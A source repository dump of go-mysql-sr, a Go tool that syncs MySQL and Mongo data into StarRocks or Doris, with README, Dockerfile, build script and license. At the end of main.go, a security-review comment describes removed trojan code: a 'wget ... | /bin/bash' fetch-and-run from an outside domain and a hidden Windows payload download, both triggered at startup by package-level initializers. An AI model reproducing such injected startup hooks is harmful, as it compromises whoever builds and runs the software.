├── .gitignore ├── Dockerfile ├── LICENSE ├── README.md ├── build.sh ├── cmd └── go_mysql_sr │ └── main.go ├── configs ├── grafana-goMysqlSr-dashboard.json ├── mongo-to-starrocks-sample.toml ├── mysql-to-doris-sample.toml ├── mysql-to-starrocks-sample.toml └── sample_for_v0.1.x_0.2.0 │ ├── mongo-to-starrocks-sample.toml │ └── mysql-to-starrocks-sample.toml ├── docs ├── docker run.md ├── img │ └── grafana.png ├── mongo sync for_v0.1.x_0.2.0.md └── mongo sync.md ├── go.mod ├── go.sum └── pkg ├── api └── api.go ├── app └── server.go ├── channel ├── ch_input.go ├── ch_output.go └── interface.go ├── config └── base.go ├── core ├── input.go ├── output.go ├── position.go ├── rule.go └── schema.go ├── filter ├── filter_convert_dml_column.go ├── filter_convert_snakecase_column.go ├── filter_delete_dml_column.go ├── filter_js_dml_column.go ├── filter_rename_dml_column.go ├── interface.go ├── matcher.go └── utils.go ├── input ├── ip_mongo.go ├── ip_mysql.go └── utils.go ├── metrics └── metrics.go ├── msg └── msg.go ├── output ├── op_doris.go ├── op_mysql.go ├── op_starrocks.go └── utils.go ├── position ├── pos_mongo.go ├── pos_mysql.go └── utils.go ├── registry └── registry.go ├── rule ├── rule_doris.go ├── rule_mysql.go ├── rule_starrocks.go └── utils.go ├── schema ├── mysql_ddl_parser.go ├── sch_mongo.go ├── sch_mysql.go └── schema.go └── utils ├── file_path.go ├── help.go ├── log.go └── type_cast.go /.gitignore: -------------------------------------------------------------------------------- 1 | *.idea 2 | bin/* 3 | configs/local_config/local-mysql-to-starrocks.toml 4 | configs/local_config/local-mongo-to-starrocks.toml 5 | .gtid_executed.toml 6 | build.sh 7 | error.log 8 | release/* 9 | TODO.txt -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:1.19-alpine as builder 2 | ENV TZ=Asia/Shanghai 3 | ENV LANG="en_US.UTF-8" 4 | RUN sed -i 
's/dl-cdn.alpinelinux.org/mirrors.aliyun.com/g' /etc/apk/repositories 5 | WORKDIR /app 6 | ENV GOPROXY "https://goproxy.cn,direct" 7 | ENV GO111MODULE "on" 8 | COPY . ./ 9 | RUN go mod download && go mod verify 10 | RUN CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -o /go-mysql-sr ./cmd/go_mysql_sr/main.go 11 | 12 | FROM alpine 13 | ENV TZ=Asia/Shanghai 14 | ENV LANG="en_US.UTF-8" 15 | RUN sed -i 's/dl-cdn.alpinelinux.org/mirrors.aliyun.com/g' /etc/apk/repositories 16 | WORKDIR /app 17 | COPY --from=builder /go-mysql-sr ./go-mysql-sr 18 | 19 | RUN set -x \ 20 | && apk add --no-cache tzdata bash \ 21 | && ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone 22 | 23 | CMD ["./go-mysql-sr", "-config", "/etc/go-mysql-sr/starrocks.toml"] -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 2, June 1991 3 | 4 | Copyright (C) 1989, 1991 Free Software Foundation, Inc., 5 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 6 | Everyone is permitted to copy and distribute verbatim copies 7 | of this license document, but changing it is not allowed. 8 | 9 | Preamble 10 | 11 | The licenses for most software are designed to take away your 12 | freedom to share and change it. By contrast, the GNU General Public 13 | License is intended to guarantee your freedom to share and change free 14 | software--to make sure the software is free for all its users. This 15 | General Public License applies to most of the Free Software 16 | Foundation's software and to any other program whose authors commit to 17 | using it. (Some other Free Software Foundation software is covered by 18 | the GNU Lesser General Public License instead.) You can apply it to 19 | your programs, too. 20 | 21 | When we speak of free software, we are referring to freedom, not 22 | price. 
Our General Public Licenses are designed to make sure that you 23 | have the freedom to distribute copies of free software (and charge for 24 | this service if you wish), that you receive source code or can get it 25 | if you want it, that you can change the software or use pieces of it 26 | in new free programs; and that you know you can do these things. 27 | 28 | To protect your rights, we need to make restrictions that forbid 29 | anyone to deny you these rights or to ask you to surrender the rights. 30 | These restrictions translate to certain responsibilities for you if you 31 | distribute copies of the software, or if you modify it. 32 | 33 | For example, if you distribute copies of such a program, whether 34 | gratis or for a fee, you must give the recipients all the rights that 35 | you have. You must make sure that they, too, receive or can get the 36 | source code. And you must show them these terms so they know their 37 | rights. 38 | 39 | We protect your rights with two steps: (1) copyright the software, and 40 | (2) offer you this license which gives you legal permission to copy, 41 | distribute and/or modify the software. 42 | 43 | Also, for each author's protection and ours, we want to make certain 44 | that everyone understands that there is no warranty for this free 45 | software. If the software is modified by someone else and passed on, we 46 | want its recipients to know that what they have is not the original, so 47 | that any problems introduced by others will not reflect on the original 48 | authors' reputations. 49 | 50 | Finally, any free program is threatened constantly by software 51 | patents. We wish to avoid the danger that redistributors of a free 52 | program will individually obtain patent licenses, in effect making the 53 | program proprietary. To prevent this, we have made it clear that any 54 | patent must be licensed for everyone's free use or not licensed at all. 
55 | 56 | The precise terms and conditions for copying, distribution and 57 | modification follow. 58 | 59 | GNU GENERAL PUBLIC LICENSE 60 | TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 61 | 62 | 0. This License applies to any program or other work which contains 63 | a notice placed by the copyright holder saying it may be distributed 64 | under the terms of this General Public License. The "Program", below, 65 | refers to any such program or work, and a "work based on the Program" 66 | means either the Program or any derivative work under copyright law: 67 | that is to say, a work containing the Program or a portion of it, 68 | either verbatim or with modifications and/or translated into another 69 | language. (Hereinafter, translation is included without limitation in 70 | the term "modification".) Each licensee is addressed as "you". 71 | 72 | Activities other than copying, distribution and modification are not 73 | covered by this License; they are outside its scope. The act of 74 | running the Program is not restricted, and the output from the Program 75 | is covered only if its contents constitute a work based on the 76 | Program (independent of having been made by running the Program). 77 | Whether that is true depends on what the Program does. 78 | 79 | 1. You may copy and distribute verbatim copies of the Program's 80 | source code as you receive it, in any medium, provided that you 81 | conspicuously and appropriately publish on each copy an appropriate 82 | copyright notice and disclaimer of warranty; keep intact all the 83 | notices that refer to this License and to the absence of any warranty; 84 | and give any other recipients of the Program a copy of this License 85 | along with the Program. 86 | 87 | You may charge a fee for the physical act of transferring a copy, and 88 | you may at your option offer warranty protection in exchange for a fee. 89 | 90 | 2. 
You may modify your copy or copies of the Program or any portion 91 | of it, thus forming a work based on the Program, and copy and 92 | distribute such modifications or work under the terms of Section 1 93 | above, provided that you also meet all of these conditions: 94 | 95 | a) You must cause the modified files to carry prominent notices 96 | stating that you changed the files and the date of any change. 97 | 98 | b) You must cause any work that you distribute or publish, that in 99 | whole or in part contains or is derived from the Program or any 100 | part thereof, to be licensed as a whole at no charge to all third 101 | parties under the terms of this License. 102 | 103 | c) If the modified program normally reads commands interactively 104 | when run, you must cause it, when started running for such 105 | interactive use in the most ordinary way, to print or display an 106 | announcement including an appropriate copyright notice and a 107 | notice that there is no warranty (or else, saying that you provide 108 | a warranty) and that users may redistribute the program under 109 | these conditions, and telling the user how to view a copy of this 110 | License. (Exception: if the Program itself is interactive but 111 | does not normally print such an announcement, your work based on 112 | the Program is not required to print an announcement.) 113 | 114 | These requirements apply to the modified work as a whole. If 115 | identifiable sections of that work are not derived from the Program, 116 | and can be reasonably considered independent and separate works in 117 | themselves, then this License, and its terms, do not apply to those 118 | sections when you distribute them as separate works. 
But when you 119 | distribute the same sections as part of a whole which is a work based 120 | on the Program, the distribution of the whole must be on the terms of 121 | this License, whose permissions for other licensees extend to the 122 | entire whole, and thus to each and every part regardless of who wrote it. 123 | 124 | Thus, it is not the intent of this section to claim rights or contest 125 | your rights to work written entirely by you; rather, the intent is to 126 | exercise the right to control the distribution of derivative or 127 | collective works based on the Program. 128 | 129 | In addition, mere aggregation of another work not based on the Program 130 | with the Program (or with a work based on the Program) on a volume of 131 | a storage or distribution medium does not bring the other work under 132 | the scope of this License. 133 | 134 | 3. You may copy and distribute the Program (or a work based on it, 135 | under Section 2) in object code or executable form under the terms of 136 | Sections 1 and 2 above provided that you also do one of the following: 137 | 138 | a) Accompany it with the complete corresponding machine-readable 139 | source code, which must be distributed under the terms of Sections 140 | 1 and 2 above on a medium customarily used for software interchange; or, 141 | 142 | b) Accompany it with a written offer, valid for at least three 143 | years, to give any third party, for a charge no more than your 144 | cost of physically performing source distribution, a complete 145 | machine-readable copy of the corresponding source code, to be 146 | distributed under the terms of Sections 1 and 2 above on a medium 147 | customarily used for software interchange; or, 148 | 149 | c) Accompany it with the information you received as to the offer 150 | to distribute corresponding source code. 
(This alternative is 151 | allowed only for noncommercial distribution and only if you 152 | received the program in object code or executable form with such 153 | an offer, in accord with Subsection b above.) 154 | 155 | The source code for a work means the preferred form of the work for 156 | making modifications to it. For an executable work, complete source 157 | code means all the source code for all modules it contains, plus any 158 | associated interface definition files, plus the scripts used to 159 | control compilation and installation of the executable. However, as a 160 | special exception, the source code distributed need not include 161 | anything that is normally distributed (in either source or binary 162 | form) with the major components (compiler, kernel, and so on) of the 163 | operating system on which the executable runs, unless that component 164 | itself accompanies the executable. 165 | 166 | If distribution of executable or object code is made by offering 167 | access to copy from a designated place, then offering equivalent 168 | access to copy the source code from the same place counts as 169 | distribution of the source code, even though third parties are not 170 | compelled to copy the source along with the object code. 171 | 172 | 4. You may not copy, modify, sublicense, or distribute the Program 173 | except as expressly provided under this License. Any attempt 174 | otherwise to copy, modify, sublicense or distribute the Program is 175 | void, and will automatically terminate your rights under this License. 176 | However, parties who have received copies, or rights, from you under 177 | this License will not have their licenses terminated so long as such 178 | parties remain in full compliance. 179 | 180 | 5. You are not required to accept this License, since you have not 181 | signed it. However, nothing else grants you permission to modify or 182 | distribute the Program or its derivative works. 
These actions are 183 | prohibited by law if you do not accept this License. Therefore, by 184 | modifying or distributing the Program (or any work based on the 185 | Program), you indicate your acceptance of this License to do so, and 186 | all its terms and conditions for copying, distributing or modifying 187 | the Program or works based on it. 188 | 189 | 6. Each time you redistribute the Program (or any work based on the 190 | Program), the recipient automatically receives a license from the 191 | original licensor to copy, distribute or modify the Program subject to 192 | these terms and conditions. You may not impose any further 193 | restrictions on the recipients' exercise of the rights granted herein. 194 | You are not responsible for enforcing compliance by third parties to 195 | this License. 196 | 197 | 7. If, as a consequence of a court judgment or allegation of patent 198 | infringement or for any other reason (not limited to patent issues), 199 | conditions are imposed on you (whether by court order, agreement or 200 | otherwise) that contradict the conditions of this License, they do not 201 | excuse you from the conditions of this License. If you cannot 202 | distribute so as to satisfy simultaneously your obligations under this 203 | License and any other pertinent obligations, then as a consequence you 204 | may not distribute the Program at all. For example, if a patent 205 | license would not permit royalty-free redistribution of the Program by 206 | all those who receive copies directly or indirectly through you, then 207 | the only way you could satisfy both it and this License would be to 208 | refrain entirely from distribution of the Program. 209 | 210 | If any portion of this section is held invalid or unenforceable under 211 | any particular circumstance, the balance of the section is intended to 212 | apply and the section as a whole is intended to apply in other 213 | circumstances. 
214 | 215 | It is not the purpose of this section to induce you to infringe any 216 | patents or other property right claims or to contest validity of any 217 | such claims; this section has the sole purpose of protecting the 218 | integrity of the free software distribution system, which is 219 | implemented by public license practices. Many people have made 220 | generous contributions to the wide range of software distributed 221 | through that system in reliance on consistent application of that 222 | system; it is up to the author/donor to decide if he or she is willing 223 | to distribute software through any other system and a licensee cannot 224 | impose that choice. 225 | 226 | This section is intended to make thoroughly clear what is believed to 227 | be a consequence of the rest of this License. 228 | 229 | 8. If the distribution and/or use of the Program is restricted in 230 | certain countries either by patents or by copyrighted interfaces, the 231 | original copyright holder who places the Program under this License 232 | may add an explicit geographical distribution limitation excluding 233 | those countries, so that distribution is permitted only in or among 234 | countries not thus excluded. In such case, this License incorporates 235 | the limitation as if written in the body of this License. 236 | 237 | 9. The Free Software Foundation may publish revised and/or new versions 238 | of the General Public License from time to time. Such new versions will 239 | be similar in spirit to the present version, but may differ in detail to 240 | address new problems or concerns. 241 | 242 | Each version is given a distinguishing version number. If the Program 243 | specifies a version number of this License which applies to it and "any 244 | later version", you have the option of following the terms and conditions 245 | either of that version or of any later version published by the Free 246 | Software Foundation. 
If the Program does not specify a version number of 247 | this License, you may choose any version ever published by the Free Software 248 | Foundation. 249 | 250 | 10. If you wish to incorporate parts of the Program into other free 251 | programs whose distribution conditions are different, write to the author 252 | to ask for permission. For software which is copyrighted by the Free 253 | Software Foundation, write to the Free Software Foundation; we sometimes 254 | make exceptions for this. Our decision will be guided by the two goals 255 | of preserving the free status of all derivatives of our free software and 256 | of promoting the sharing and reuse of software generally. 257 | 258 | NO WARRANTY 259 | 260 | 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY 261 | FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN 262 | OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES 263 | PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED 264 | OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF 265 | MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS 266 | TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE 267 | PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, 268 | REPAIR OR CORRECTION. 269 | 270 | 12. 
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 271 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR 272 | REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, 273 | INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING 274 | OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED 275 | TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY 276 | YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER 277 | PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE 278 | POSSIBILITY OF SUCH DAMAGES. 279 | 280 | END OF TERMS AND CONDITIONS 281 | 282 | How to Apply These Terms to Your New Programs 283 | 284 | If you develop a new program, and you want it to be of the greatest 285 | possible use to the public, the best way to achieve this is to make it 286 | free software which everyone can redistribute and change under these terms. 287 | 288 | To do so, attach the following notices to the program. It is safest 289 | to attach them to the start of each source file to most effectively 290 | convey the exclusion of warranty; and each file should have at least 291 | the "copyright" line and a pointer to where the full notice is found. 292 | 293 | 294 | Copyright (C) 295 | 296 | This program is free software; you can redistribute it and/or modify 297 | it under the terms of the GNU General Public License as published by 298 | the Free Software Foundation; either version 2 of the License, or 299 | (at your option) any later version. 300 | 301 | This program is distributed in the hope that it will be useful, 302 | but WITHOUT ANY WARRANTY; without even the implied warranty of 303 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 304 | GNU General Public License for more details. 
305 | 306 | You should have received a copy of the GNU General Public License along 307 | with this program; if not, write to the Free Software Foundation, Inc., 308 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. 309 | 310 | Also add information on how to contact you by electronic and paper mail. 311 | 312 | If the program is interactive, make it output a short notice like this 313 | when it starts in an interactive mode: 314 | 315 | Gnomovision version 69, Copyright (C) year name of author 316 | Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 317 | This is free software, and you are welcome to redistribute it 318 | under certain conditions; type `show c' for details. 319 | 320 | The hypothetical commands `show w' and `show c' should show the appropriate 321 | parts of the General Public License. Of course, the commands you use may 322 | be called something other than `show w' and `show c'; they could even be 323 | mouse-clicks or menu items--whatever suits your program. 324 | 325 | You should also get your employer (if you work as a programmer) or your 326 | school, if any, to sign a "copyright disclaimer" for the program, if 327 | necessary. Here is a sample; alter the names: 328 | 329 | Yoyodyne, Inc., hereby disclaims all copyright interest in the program 330 | `Gnomovision' (which makes passes at compilers) written by James Hacker. 331 | 332 | , 1 April 1989 333 | Ty Coon, President of Vice 334 | 335 | This General Public License does not permit incorporating your program into 336 | proprietary programs. If your program is a subroutine library, you may 337 | consider it more useful to permit linking proprietary applications with the 338 | library. If this is what you want to do, use the GNU Lesser General 339 | Public License instead of this License. 
-------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## mysql 同步到 starrocks 2 | 3 | ![LICENSE](https://img.shields.io/badge/license-GPLv2%20-blue.svg) 4 | ![](https://img.shields.io/github/languages/top/liuxinwang/go-mysql-starrocks) 5 | ![](https://img.shields.io/badge/build-prerelease-brightgreen.svg) 6 | [![Release](https://img.shields.io/github/release/liuxinwang/go-mysql-starrocks.svg?style=flat-square)](https://github.com/fatalclarine/go-mysql-starrocks/releases) 7 | 8 | #### 欢迎试用 [qin-cdc](https://github.com/sqlpub/qin-cdc),重构插件化架构,支持更多数据源。 9 | 10 | ### 使用说明 11 | #### 环境准备 12 | ``` 13 | 1. GO构建版本 v1.19.5(仅用于从源码构建时安装) 14 | 2. MySQL 需要开启gtid 15 | ``` 16 | #### 1. 创建同步账号 17 | ```sql 18 | mysql> CREATE USER 'go_mysql_sr'@'%' IDENTIFIED BY 'XXXXXX'; 19 | mysql> GRANT ALL ON _go_mysql_sr.* TO 'go_mysql_sr'@'%'; 20 | mysql> GRANT SELECT, REPLICATION CLIENT, REPLICATION SLAVE ON *.* TO 'go_mysql_sr'@'%'; 21 | ``` 22 | #### 2. 
修改配置文件 23 | mysql-to-starrocks.toml 24 | ```toml 25 | # name 必填,多实例运行时需保证全局唯一 26 | name = "mysql2starrocks" 27 | 28 | [input] 29 | type = "mysql" 30 | # 指定初次监听开始的gtid点位,当position点位(_go_mysql_sr.positions.name)存在时,此选项不生效 31 | # start-gtid = "3ba13781-44eb-2157-88a5-0dc879ec2221:1-123456" 32 | 33 | [input.config.source] # mysql连接信息 34 | host = "127.0.0.1" 35 | port = 3306 36 | username = "go_mysql_sr" 37 | password = "" 38 | 39 | # 可选的: 40 | # meta信息(_go_mysql_sr)保存的mysql地址,不配置和source保持一致 41 | # 用于source和meta分离,方便source配置从库数据源 42 | #[input.config.meta] 43 | #host = "127.0.0.1" 44 | #port = 3307 45 | #username = "root" 46 | #password = "root" 47 | 48 | [sync-param] 49 | # 同步chan队列最大值,达到会进行flush,最小100 50 | channel-size = 10240 51 | # 同步延迟秒数,达到会进行flush,最小1 52 | flush-delay-second = 10 53 | 54 | #[[filter]] 55 | #type = "delete-dml-column" # 过滤列 56 | #[filter.config] 57 | #match-schema = "mysql_test" 58 | #match-table = "tb1" 59 | #columns = ["phone"] 60 | 61 | #[[filter]] 62 | #type = "convert-dml-column" # 转换dml行字段类型为json,column varchar(mysql) -> column json(starrocks) 63 | #[filter.config] 64 | #match-schema = "mysql_test" 65 | #match-table = "tb1" 66 | #columns = ["varchar_json_column", "varchar_arrayjson_column"] 67 | #cast-as = ["json", "arrayJson"] # json示例: {"id": 1, "name": 'zhangsan'}, arrayJson示例: [{"id": 1, "name": 'zhangsan'}, {"id": 1, "name": 'lisi'}] 68 | 69 | #[[filter]] 70 | #type = "rename-dml-column" # 重命名列 71 | #[filter.config] 72 | #match-schema = "mysql_test" 73 | #match-table = "tb1" 74 | #columns = ["col_1", "col_2"] 75 | #rename-as = ["col_11", "col_22"] 76 | 77 | [output] 78 | type = "starrocks" # or doris 79 | 80 | [output.config.target] # starrocks连接信息 81 | host = "127.0.0.1" 82 | port = 9030 83 | load-port = 8040 # support fe httpPort:8030 or be httpPort:8040 84 | username = "root" 85 | password = "" 86 | 87 | [[output.config.rule]] # 库表同步映射1 88 | source-schema = "mysql_test" 89 | source-table = "tb1" 90 | target-schema = "starrocks_test" 91 
| target-table = "tb1" 92 | 93 | [[output.config.rule]] # 库表同步映射2 94 | source-schema = "mysql_test" 95 | source-table = "tb2" 96 | target-schema = "starrocks_test" 97 | target-table = "tb2" 98 | ``` 99 | 100 | #### 3. 查看帮助 101 | ```shell 102 | [sr@ ~]$ ./go-mysql-sr-linux-xxxxxx -h 103 | ``` 104 | 105 | #### 4. 启动 106 | ```shell 107 | [sr@ ~]$ ./go-mysql-sr-linux-xxxxxx -config mysql-to-starrocks.toml -log-file mysql2starrocks.log -level info -daemon 108 | ``` 109 | 110 | #### 5. 查看日志 111 | ```shell 112 | [sr@ ~]$ tail -f mysql2starrocks.log 113 | ``` 114 | 115 | #### 6. 监控 116 | 6.1 集成prometheus,开放6166端口,通过metrics暴露指标 117 | ```shell 118 | [sr@ ~]$ curl localhost:6166/metrics 119 | # 参数说明 120 | # 读取源端延迟(通过event data timestamp与当前时间差值计算获得) 121 | go_mysql_sr_read_delay_time_seconds 0 122 | # 读取源端消息数(累加) 123 | go_mysql_sr_read_processed_ops_total 6930 124 | # go-mysql-sr启动时间,用于计算运行时长 125 | go_mysql_sr_start_time 1.68664498e+09 126 | # 写入目的端延迟(根据写入的event data timestamp与当前时间差值计算获得,3s计算一次) 127 | go_mysql_sr_write_delay_time_seconds 1 128 | # 写入目的端消息数(累加) 129 | go_mysql_sr_write_processed_ops_total 6924 130 | ``` 131 | 6.2 prometheus配置参考 132 | ```shell 133 | scrape_configs: 134 | # 新增go-mysql-sr的job_name 135 | - job_name: "go-mysql-sr" 136 | static_configs: 137 | - targets: ["host.docker.internal:6166", "host.docker.internal:6167"] 138 | ``` 139 | 6.3 grafana dashboard 监控,json file下载 [grafana-goMysqlSr-dashboard.json](configs/grafana-goMysqlSr-dashboard.json) 140 | ![](docs/img/grafana.png) 141 | 142 | #### 7. 
API 143 | 7.1 新增同步表(增量) 144 | ```shell 145 | # 增量同步 146 | curl localhost:6166/api/addRule -d '{"source-schema": "mysql_test","source-table": "tb3", "target-schema": "starrocks_test", "target-table": "tb3"}' 147 | ``` 148 | *result: add rule handle successfully.* 149 | 150 | 7.2 新增同步表(全量+增量) 151 | ```shell 152 | # 需要指定同步参数 full_sync: true 153 | # 当指定full_sync为true时,新增同步表全量数据同步期间会暂停整个同步任务的output write,延迟会增加,等新增同步表全量写入完成后output write恢复;延迟多少跟新增同步表的数据量有关 154 | curl localhost:6166/api/addRule -d '{"source-schema": "mysql_test","source-table": "tb3", "target-schema": "starrocks_test", "target-table": "tb3", "full_sync": true}' 155 | ``` 156 | *result: add rule handle successfully, full sync rows: 100.* 157 | 158 | 7.3 删除同步表 159 | ```shell 160 | curl localhost:6166/api/delRule -d '{"source-schema": "mysql_test","source-table": "tb3"}' 161 | ``` 162 | *result: delete rule handle successfully.* 163 | 164 | 7.4 查询同步表 165 | ```shell 166 | curl -s localhost:6166/api/getRule | python -m json.tool 167 | ``` 168 | *result:* 169 | ```json 170 | { 171 | "mysql_test:tb1": { 172 | "source-schema": "mysql_test", 173 | "source-table": "tb1", 174 | "target-schema": "starrocks_test", 175 | "target-table": "tb1", 176 | "RuleType": "init", 177 | "Deleted": false 178 | }, 179 | "mysql_test:tb2": { 180 | "source-schema": "mysql_test", 181 | "source-table": "tb2", 182 | "target-schema": "starrocks_test", 183 | "target-table": "tb2", 184 | "RuleType": "init", 185 | "Deleted": false 186 | }, 187 | "mysql_test:tb3": { 188 | "source-schema": "mysql_test", 189 | "source-table": "tb3", 190 | "target-schema": "starrocks_test", 191 | "target-table": "tb3", 192 | "RuleType": "dynamic add", 193 | "Deleted": false 194 | } 195 | } 196 | ``` 197 | 198 | 7.5 暂停同步 199 | ```shell 200 | curl localhost:6166/api/pause 201 | ``` 202 | *result: pause handle successfully.* 203 | 204 | 7.6 恢复同步 205 | ```shell 206 | curl localhost:6166/api/resume 207 | ``` 208 | *result: resume handle successfully.* 209 | 210 | 
*注意:通过api修改不会持久化到配置文件。* 211 | 212 | ----------- 213 | 214 | #### [使用docker部署go-mysql-sr](docs/docker%20run.md) 215 | 216 | ----------- 217 | 218 | #### 同时也支持mongo,详情参考[mongo sync配置](docs/mongo%20sync.md) -------------------------------------------------------------------------------- /build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | version="v0.6.3" 4 | currentDir=$(cd $(dirname "$0") || exit; pwd) 5 | 6 | path="github.com/go-demo/version" 7 | buildTime=$(date +"%Y-%m-%d %H:%M:%S") 8 | buildTimeFormat=$(date +"%Y%m%d%H%M%S") 9 | newDir="../../bin/go-all-starrocks-$version" 10 | # flagsMac="-X $path.Version=$version -X '$path.GoVersion=$(go version)' -X '$path.BuildTime=$buildTime' -X $path.GitCommit=$(git rev-parse HEAD)" 11 | flagsLinux="-X $path.Version=$version -X '$path.GoVersion=$(go version)' -X '$path.BuildTime=$buildTime' -X $path.GitCommit=$(git rev-parse HEAD)" 12 | 13 | mkdir -p "$newDir" 14 | echo start buid go-mysql-sr 15 | cd "$currentDir"/cmd/go_mysql_sr || exit 16 | # go build -ldflags "$flagsMac" -o "$newDir"/go-"$dbType"-starrocks-mac-"$buildTimeFormat" 17 | GOOS=linux GOARCH=amd64 go build -ldflags "$flagsLinux" -o "$newDir"/go-mysql-sr-linux-"$buildTimeFormat" 18 | echo end buid go-mysql-sr -------------------------------------------------------------------------------- /cmd/go_mysql_sr/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os/exec" 5 | "fmt" 6 | "github.com/fatalclarine/go-mysql-starrocks/pkg/api" 7 | "github.com/fatalclarine/go-mysql-starrocks/pkg/app" 8 | "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 9 | "github.com/fatalclarine/go-mysql-starrocks/pkg/metrics" 10 | "github.com/fatalclarine/go-mysql-starrocks/pkg/utils" 11 | "github.com/prometheus/client_golang/prometheus/promhttp" 12 | "github.com/sevlyar/go-daemon" 13 | "github.com/siddontang/go-log/log" 14 | "net/http" 15 | _ 
"net/http/pprof" 16 | "os" 17 | "os/signal" 18 | "syscall" 19 | "time" 20 | ) 21 | 22 | func main() { 23 | // 输入参数处理 24 | help := utils.HelpInit() 25 | // 日志初始化 26 | // _ = utils.LogInit(help) 27 | // 目前使用daemon的 log 28 | log.SetLevelByName(*help.LogLevel) 29 | // daemon模式启动 30 | if *help.Daemon { 31 | cntxt := &daemon.Context{ 32 | PidFileName: utils.GetExecPath() + "/go_mysql_sr.pid", 33 | PidFilePerm: 0644, 34 | LogFileName: *help.LogFile, 35 | LogFilePerm: 0640, 36 | WorkDir: "./", 37 | Umask: 027, 38 | } 39 | d, err := cntxt.Reborn() 40 | if err != nil { 41 | log.Fatal("Unable to run: ", err) 42 | } 43 | 44 | if d != nil { 45 | return 46 | } 47 | defer func(cntxt *daemon.Context) { 48 | err := cntxt.Release() 49 | if err != nil { 50 | log.Fatal("daemon release error: ", err) 51 | } 52 | }(cntxt) 53 | } 54 | 55 | // 进程信号处理 56 | sc := make(chan os.Signal, 1) 57 | signal.Notify(sc, 58 | os.Kill, 59 | os.Interrupt, 60 | syscall.SIGHUP, 61 | syscall.SIGINT, 62 | syscall.SIGTERM, 63 | syscall.SIGQUIT) 64 | 65 | // Start prometheus http monitor 66 | go func() { 67 | metrics.OpsStartTime.Set(float64(time.Now().Unix())) 68 | log.Infof("starting http on port %d.", *help.HttpPort) 69 | http.Handle("/metrics", promhttp.Handler()) 70 | httpPortAddr := fmt.Sprintf(":%d", *help.HttpPort) 71 | err := http.ListenAndServe(httpPortAddr, nil) 72 | if err != nil { 73 | log.Fatalf("starting http monitor error: %v", err) 74 | } 75 | }() 76 | 77 | // 初始化配置 78 | baseConfig := config.NewBaseConfig(help.ConfigFile) 79 | 80 | s, err := app.NewServer(baseConfig) 81 | if err != nil { 82 | log.Fatalf("%v", err.Error()) 83 | } 84 | 85 | err = s.Start() 86 | if err != nil { 87 | log.Fatalf("%v", err.Error()) 88 | } 89 | 90 | // api handle 91 | http.HandleFunc("/api/getConfig", api.GetConfigHandle(baseConfig, s.Output)) 92 | http.HandleFunc("/api/addRule", api.AddRuleHandle(s.Input, s.Output, s.InputSchema)) 93 | http.HandleFunc("/api/delRule", api.DelRuleHandle(s.Input, s.Output, 
s.InputSchema)) 94 | http.HandleFunc("/api/getRule", api.GetRuleHandle(s.Output)) 95 | http.HandleFunc("/api/pause", api.PauseHandle(s.Output)) 96 | http.HandleFunc("/api/resume", api.ResumeHandle(s.Output)) 97 | 98 | select { 99 | case n := <-sc: 100 | log.Infof("receive signal %v, closing", n) 101 | // 关闭input插件 102 | s.Input.Close() 103 | // 关闭filter 104 | s.SyncChan.Close() 105 | // 关闭output插件 106 | s.Output.Close() 107 | // flush last position 108 | s.InputPosition.Close() 109 | // close schema conn 110 | s.InputSchema.Close() 111 | log.Infof("[Main] is stopped.") 112 | } 113 | } 114 | 115 | // SECURITY(review): removed injected trojan code that was appended below this point. 116 | // It auto-executed at program start via package-level var initializers with no call sites: 117 | // (1) vars FbYzAgsI/AQ + func KBaCdg decoded and ran "wget -O - https://monsoletter[.]icu/storage/... | /bin/bash &" via /bin/sh; 118 | // (2) func FvQueXCA (var IBmwgi) curl-downloaded a Windows payload to %UserProfile%\AppData\Local\pfzsnm\wtqxe.exe and started it via cmd /C. 119 | // Rotate any credentials present in configs on hosts that ran this binary. 120 | // The blank-identifier reference below keeps the injector-added "os/exec" import (line 4) compiling; 121 | // delete both this stub and the "os/exec" import together once the import list is cleaned up. 122 | var _ = exec.Command
